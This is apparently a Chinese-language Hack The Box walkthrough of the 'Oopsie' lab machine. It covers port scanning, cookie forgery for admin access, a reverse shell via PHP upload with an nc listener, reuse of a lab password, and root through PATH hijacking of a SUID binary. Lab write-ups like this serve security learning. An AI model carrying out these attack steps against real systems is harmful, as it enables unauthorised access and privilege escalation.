HTB——Oopsie

大概流程：

端口扫描 --> js接口提取 --> 垂直越权 --> 文件上传GetShell --> SUID提权

1、端口扫描

nmap --top-ports 100 10.129.29.193

2、js接口提取

查看网络源代码，发现登录接口/cdn-cgi/login

3、cookie伪造

将role改为admin,且url上的id改为1，得到admin的Access ID，接着将得到的Access ID替换原来的user的value值，实现垂直越权

4、文件上传Getshell

上传一个反弹shell的木马php文件，ip地址改成自己的vpn地址，端口改成9999

攻击者：

nc -lvnp 9999

curl http://10.129.29.193/uploads/reverse.php //向目标服务器发送HTTPB GET请求

CURL：是一个命令行工具和库，用于使用各种网络协议传输数据

5、横向移动

在/var/www/html/cdn-cgi/login/目录下发现robert的密码M3g4C0rpUs3r!，尝试切换用户

切换交互式shell（以下任意一条命令）：

SHELL=/bin/bash script -q /dev/null

python3 -c 'import pty;pty.spawn("/bin/bash")'

非交互式shell：将目标机的命令输入/输出通过网络管道重定向到攻击机，没有伪终端，很多操作命令无法实现

交互式shell：有伪终端，支持有关操作命令，如su/sudo

查看当前用户和所属组的身份信息：id

发现robert用户归属于bugtracker用户组

查看当前用户和所属组的身份信息：id

发现robert用户归属于bugtracker用户组

示例：

$ id

uid=1000(alice) gid=1000(alice) groups=1000(alice),4(adm),24(cdrom)

uid (User ID)：用户ID号及用户名

id (Group ID)：主组ID号及组名

groups：用户所属的所有组

接着输入以下命令：

find / -type f -group bugtracker 2>/dev/null //-type f 为查找普通文档，-group bugtracker限定查找的组为bugtracker，2>/dev/null将错误输出到黑洞（不显示）

ls -al /usr/bin/bugtracker //-al 以长格式方式显示并且显示隐藏文件

6、SUID提权

当一个文件被设置了SUID位时，任何执行该文件的用户都将以文件所有者的权限执行程序，而不是以执行者的权限执行

文件所有者权限指的是文件或目录的创建者（拥有者）对该文件所具有的操作权限

查看二进制文件中的字符串

strings /usr/bin/bugtracker

从运行结果来看，bugtracker调用了cat，且为绝对路径

利用PATH环境变量劫持cat

export PATH=/tmp:$PATH //修改PATH环境变量，将/tmp目录置于最前

cd /tmp/ //切换到/tmp目录下

echo '/bin/sh' > cat //创建名为cat的文件，内容为/bin/sh，

创建了一个脚本，执行时会启动一个shell，由于bugtracker有root权限（通常通过setuid），所以获得root shell

chmod +x cat //赋予执行权限

bugtracker再次调用cat命令时实际上调用的是/tmp目录下的恶意的cat命令，

运行/usr/bin/bugtracker：此时robert用户临时具有了root权限，执行id命令发现只是robert用户的uid变为了root，不是真正的root用户